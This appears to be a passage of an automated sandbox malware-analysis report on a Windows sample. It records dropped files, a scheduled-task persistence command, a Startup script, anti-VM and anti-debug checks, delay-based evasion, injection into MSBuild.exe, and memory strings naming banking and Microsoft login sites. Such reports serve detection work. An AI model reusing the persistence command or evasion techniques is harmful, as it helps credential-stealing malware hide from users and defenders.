                  Source: 0.2.00000123.exe.717fd00.4.raw.unpack, R7pp1CEv5h7lSYql4h.csHigh entropy of concatenated method names: 'H0Iqq534L24Kv13NonE', 'sKF2fv3hQI8kgvu71Ky', 'RPf22qP4OG', 'vh0ry9Sq2v', 'Eyq2sPFYYw', 'lqO24gUOMk', 'l9j2hHC2HH', 'g6E2FQUw29', 'icuxOHIjhQ', 'qCnfGOfOL'

                  Persistence and Installation Behavior

                  Source: C:\Windows\SysWOW64\cmd.exe File created: C:\Users\user\AppData\Local\Temp\611485\Heroes.com
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.com File created: C:\Users\user\AppData\Local\CryptoGuard360 Scan Elite Systems Inc\GuardianCryptoScan360.com
                  Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\ipconfig.exe ipconfig /release
                  Source: C:\Users\user\Desktop\00000123.exe File created: C:\Users\user\AppData\Local\Temp\update.exe
                  Source: C:\Users\user\Desktop\00000123.exe File created: C:\Users\user\AppData\Roaming\updatte.exe

                  Boot Survival

                  Source: C:\Users\user\Desktop\00000123.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\updatte.vbs
                  Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe /create /tn "Persian" /tr "wscript //B 'C:\Users\user\AppData\Local\CryptoGuard360 Scan Elite Systems Inc\GuardianCryptoScan360.js'" /sc daily /mo 1 /ri 3 /du 23:57 /F /RL HIGHEST
                  Source: C:\Users\user\AppData\Local\CryptoGuard360 Scan Elite Systems Inc\GuardianCryptoScan360.comCode function: 28_2_007B26DD IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,28_2_007B26DD
                  Source: C:\Users\user\AppData\Local\CryptoGuard360 Scan Elite Systems Inc\GuardianCryptoScan360.comCode function: 28_2_0073FC7C GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,28_2_0073FC7C
                  Source: C:\Users\user\Desktop\00000123.exe Process information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\update.exe Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\tasklist.exe Process information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.com Process information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.com Process information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\CryptoGuard360 Scan Elite Systems Inc\GuardianCryptoScan360.comProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\CryptoGuard360 Scan Elite Systems Inc\GuardianCryptoScan360.comProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX

                  Malware Analysis System Evasion

                  Source: Yara matchFile source: Process Memory Space: 00000123.exe PID: 7248, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: MSBuild.exe PID: 7400, type: MEMORYSTR
                  Source: 00000123.exe, 00000000.00000002.2533339208.00000000035C1000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000025.00000002.2833990069.0000000003391000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SBIEDLL.DLL
                  Source: C:\Users\user\Desktop\00000123.exe Memory allocated: 1B80000 memory reserve | memory write watch
                  Source: C:\Users\user\Desktop\00000123.exe Memory allocated: 35C0000 memory reserve | memory write watch
                  Source: C:\Users\user\Desktop\00000123.exe Memory allocated: 1C20000 memory reserve | memory write watch
                  Source: C:\Users\user\Desktop\00000123.exe Memory allocated: 6F40000 memory reserve | memory write watch
                  Source: C:\Users\user\Desktop\00000123.exe Memory allocated: 66B0000 memory reserve | memory write watch
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMemory allocated: 3060000 memory reserve | memory write watch
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMemory allocated: 32D0000 memory reserve | memory write watch
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMemory allocated: 30D0000 memory reserve | memory write watch
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeMemory allocated: 30F0000 memory reserve | memory write watch
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeMemory allocated: 3390000 memory reserve | memory write watch
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeMemory allocated: 30F0000 memory reserve | memory write watch
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 922337203685477
                  Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-Timer
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.com Window / User API: threadDelayed 3719
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow / User API: threadDelayed 1909
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow / User API: threadDelayed 6532
                  Source: C:\Users\user\Desktop\00000123.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\updatte.exe
                  Source: C:\Users\user\AppData\Local\CryptoGuard360 Scan Elite Systems Inc\GuardianCryptoScan360.comAPI coverage: 4.3 %
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.com TID: 7996 Thread sleep time: -37190s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 4208Thread sleep time: -19369081277395017s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 4208Thread sleep time: -39000s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 4208Thread sleep time: -38875s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 4208Thread sleep time: -38766s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 4208Thread sleep time: -38641s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 4208Thread sleep time: -38516s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 4208Thread sleep time: -38406s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 4208Thread sleep time: -38297s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 4208Thread sleep time: -38188s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 4208Thread sleep time: -38063s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 4208Thread sleep time: -37950s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 4208Thread sleep time: -38000s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 4208Thread sleep time: -37891s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 4208Thread sleep time: -37781s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 4208Thread sleep time: -37672s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 4208Thread sleep time: -37562s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 4208Thread sleep time: -37453s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 4208Thread sleep time: -37335s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 4208Thread sleep time: -37219s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 4208Thread sleep time: -37109s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 4208Thread sleep time: -37000s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 4208Thread sleep time: -36891s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 4208Thread sleep time: -36781s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 4208Thread sleep time: -36672s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 4208Thread sleep time: -36562s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 4208Thread sleep time: -36453s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 4208Thread sleep time: -36344s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 4208Thread sleep time: -36233s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 4208Thread sleep time: -36109s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 4208Thread sleep time: -35997s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 4208Thread sleep time: -35875s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 4208Thread sleep time: -35766s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 4208Thread sleep time: -35655s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 4208Thread sleep time: -35531s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 2584Thread sleep time: -922337203685477s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_ComputerSystem
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                  Source: C:\Users\user\Desktop\00000123.exeLast function: Thread delayed
                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.com Thread sleep count: Count: 3719 delay: -10
                  Source: C:\Users\user\AppData\Local\Temp\update.exeCode function: 6_2_004062D5 FindFirstFileW,FindClose,6_2_004062D5
                  Source: C:\Users\user\AppData\Local\Temp\update.exeCode function: 6_2_00402E18 FindFirstFileW,6_2_00402E18
                  Source: C:\Users\user\AppData\Local\Temp\update.exeCode function: 6_2_00406C9B DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,6_2_00406C9B
                  Source: C:\Users\user\AppData\Local\CryptoGuard360 Scan Elite Systems Inc\GuardianCryptoScan360.comCode function: 28_2_0079A087 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,28_2_0079A087
                  Source: C:\Users\user\AppData\Local\CryptoGuard360 Scan Elite Systems Inc\GuardianCryptoScan360.comCode function: 28_2_0079A1E2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,28_2_0079A1E2
                  Source: C:\Users\user\AppData\Local\CryptoGuard360 Scan Elite Systems Inc\GuardianCryptoScan360.comCode function: 28_2_0078E472 lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,28_2_0078E472
                  Source: C:\Users\user\AppData\Local\CryptoGuard360 Scan Elite Systems Inc\GuardianCryptoScan360.comCode function: 28_2_0079A570 FindFirstFileW,Sleep,FindNextFileW,FindClose,28_2_0079A570
                  Source: C:\Users\user\AppData\Local\CryptoGuard360 Scan Elite Systems Inc\GuardianCryptoScan360.comCode function: 28_2_0075C622 FindFirstFileExW,28_2_0075C622
                  Source: C:\Users\user\AppData\Local\CryptoGuard360 Scan Elite Systems Inc\GuardianCryptoScan360.comCode function: 28_2_007966DC FindFirstFileW,FindNextFileW,FindClose,28_2_007966DC
                  Source: C:\Users\user\AppData\Local\CryptoGuard360 Scan Elite Systems Inc\GuardianCryptoScan360.comCode function: 28_2_00797333 FindFirstFileW,FindClose,28_2_00797333
                  Source: C:\Users\user\AppData\Local\CryptoGuard360 Scan Elite Systems Inc\GuardianCryptoScan360.comCode function: 28_2_007973D4 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,28_2_007973D4
                  Source: C:\Users\user\AppData\Local\CryptoGuard360 Scan Elite Systems Inc\GuardianCryptoScan360.comCode function: 28_2_0078D921 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,28_2_0078D921
                  Source: C:\Users\user\AppData\Local\CryptoGuard360 Scan Elite Systems Inc\GuardianCryptoScan360.comCode function: 28_2_0078DC54 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,28_2_0078DC54
                  Source: C:\Users\user\AppData\Local\CryptoGuard360 Scan Elite Systems Inc\GuardianCryptoScan360.comCode function: 28_2_00725FC8 GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,28_2_00725FC8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 922337203685477
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 39000
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 38875
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 38766
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 38641
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 38516
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 38406
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 38297
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 38188
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 38063
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 37950
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 38000
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 37891
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 37781
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 37672
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 37562
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 37453
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 37335
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 37219
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 37109
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 37000
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 36891
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 36781
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 36672
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 36562
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 36453
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 36344
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 36233
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 36109
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 35997
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 35875
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 35766
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 35655
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 35531
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 922337203685477
                  Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\Local\
                  Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\Local\Temp\611485
                  Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\Local\Temp\611485\
                  Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\
                  Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\
                  Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\Local\Temp\
                  Source: MSBuild.exe, 00000025.00000002.2842262338.00000000044A0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696428655x
                  Source: MSBuild.exe, 00000025.00000002.2842262338.00000000044A0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: discord.comVMware20,11696428655f
                  Source: MSBuild.exe, 00000025.00000002.2842262338.00000000044A0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.co.inVMware20,11696428655d
                  Source: MSBuild.exe, 00000025.00000002.2842262338.00000000044A0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
                  Source: MSBuild.exe, 00000025.00000002.2842262338.00000000044A0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696428655
                  Source: MSBuild.exe, 00000025.00000002.2842262338.00000000044A0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696428655}
                  Source: 00000123.exe, 00000000.00000002.2533339208.00000000035C1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Microsoft|VMWare|Virtual
                  Source: MSBuild.exe, 00000025.00000002.2833990069.0000000003391000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmGuestLib.dllDselect * from Win32_ComputerSystem
                  Source: MSBuild.exe, 00000025.00000002.2842262338.00000000044A0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
                  Source: MSBuild.exe, 00000025.00000002.2842262338.00000000044A0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
                  Source: MSBuild.exe, 00000025.00000002.2842262338.00000000044A0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,11696428655u
                  Source: MSBuild.exe, 00000025.00000002.2842262338.00000000044A0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
                  Source: MSBuild.exe, 00000025.00000002.2842262338.00000000044A0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.comVMware20,11696428655}
                  Source: MSBuild.exe, 00000025.00000002.2842262338.00000000044A0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
                  Source: MSBuild.exe, 00000025.00000002.2842262338.00000000044A0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
                  Source: MSBuild.exe, 00000025.00000002.2842262338.00000000044A0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696428655t
                  Source: MSBuild.exe, 00000025.00000002.2842262338.00000000044A0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696428655x
                  Source: MSBuild.exe, 00000025.00000002.2830131442.000000000149A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                  Source: MSBuild.exe, 00000025.00000002.2842262338.00000000044A0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655
                  Source: MSBuild.exe, 00000025.00000002.2842262338.00000000044A0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696428655s
                  Source: MSBuild.exe, 00000025.00000002.2842262338.00000000044A0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
                  Source: MSBuild.exe, 00000025.00000002.2842262338.00000000044A0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696428655
                  Source: MSBuild.exe, 00000025.00000002.2842262338.00000000044A0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696428655
                  Source: MSBuild.exe, 00000025.00000002.2842262338.00000000044A0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,11696428655o
                  Source: wscript.exe, 0000001A.00000003.2435191910.000001AE7EB14000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                  Source: MSBuild.exe, 00000025.00000002.2842262338.00000000044A0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
                  Source: MSBuild.exe, 00000025.00000002.2842262338.00000000044A0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696428655t
                  Source: MSBuild.exe, 00000025.00000002.2842262338.00000000044A0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.comVMware20,11696428655
                  Source: MSBuild.exe, 00000025.00000002.2842262338.00000000044A0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
                  Source: MSBuild.exe, 00000025.00000002.2842262338.00000000044A0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696428655j
                  Source: MSBuild.exe, 00000025.00000002.2842262338.00000000044A0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: netportal.hdfcbank.comVMware20,11696428655
                  Source: 00000123.exe, 00000000.00000002.2533339208.00000000035C1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware|VIRTUAL|A M I|Xen
                  Source: MSBuild.exe, 00000025.00000002.2833990069.0000000003391000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 0VMware|VIRTUAL|A M I|Xen4win32_process.handle='{0}'
                  Source: MSBuild.exe, 00000025.00000002.2842262338.00000000044A0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - HKVMware20,11696428655]
                  Source: MSBuild.exe, 00000025.00000002.2833990069.0000000003391000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: model0Microsoft|VMWare|Virtual
                  Source: wscript.exe, 0000001A.00000003.2435191910.000001AE7EB14000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: d32_NECVMWar&Prod_VMware_SATA_C
                  Source: MSBuild.exe, 00000025.00000002.2842262338.00000000044A0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696428655x
                  Source: MSBuild.exe, 00000025.00000002.2842262338.00000000044A0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696428655h
                  Source: MSBuild.exe, 00000025.00000002.2842262338.00000000044A0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696428655
                  Source: C:\Users\user\Desktop\00000123.exe Process information queried: ProcessInformation
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess queried: DebugPort
                  Source: C:\Users\user\AppData\Local\CryptoGuard360 Scan Elite Systems Inc\GuardianCryptoScan360.comCode function: 28_2_0079F4FF BlockInput,28_2_0079F4FF
                  Source: C:\Users\user\AppData\Local\CryptoGuard360 Scan Elite Systems Inc\GuardianCryptoScan360.comCode function: 28_2_0072338B GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,KiUserCallbackDispatcher,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,28_2_0072338B
                  Source: C:\Users\user\AppData\Local\Temp\update.exeCode function: 6_2_004062FC GetModuleHandleA,LoadLibraryA,GetProcAddress,6_2_004062FC
                  Source: C:\Users\user\AppData\Local\CryptoGuard360 Scan Elite Systems Inc\GuardianCryptoScan360.comCode function: 28_2_00745058 mov eax, dword ptr fs:[00000030h]28_2_00745058
                  Source: C:\Users\user\AppData\Local\CryptoGuard360 Scan Elite Systems Inc\GuardianCryptoScan360.comCode function: 28_2_007820AA GetLengthSid,GetProcessHeap,HeapAlloc,CopySid,GetProcessHeap,HeapFree,28_2_007820AA
                  Source: C:\Users\user\Desktop\00000123.exe Process token adjusted: Debug
                  Source: C:\Windows\SysWOW64\tasklist.exe Process token adjusted: Debug
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess token adjusted: Debug
                  Source: C:\Users\user\AppData\Local\CryptoGuard360 Scan Elite Systems Inc\GuardianCryptoScan360.comCode function: 28_2_00752992 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,28_2_00752992
                  Source: C:\Users\user\AppData\Local\CryptoGuard360 Scan Elite Systems Inc\GuardianCryptoScan360.comCode function: 28_2_00740BAF IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,28_2_00740BAF
                  Source: C:\Users\user\AppData\Local\CryptoGuard360 Scan Elite Systems Inc\GuardianCryptoScan360.comCode function: 28_2_00740D45 SetUnhandledExceptionFilter,28_2_00740D45
                  Source: C:\Users\user\AppData\Local\CryptoGuard360 Scan Elite Systems Inc\GuardianCryptoScan360.comCode function: 28_2_00740F91 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,28_2_00740F91
                  Source: C:\Users\user\Desktop\00000123.exe Memory allocated: page read and write | page guard

                  HIPS / PFW / Operating System Protection Evasion

                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.com Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 1340000 value starts with: 4D5A
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 1340C1CJump to behavior
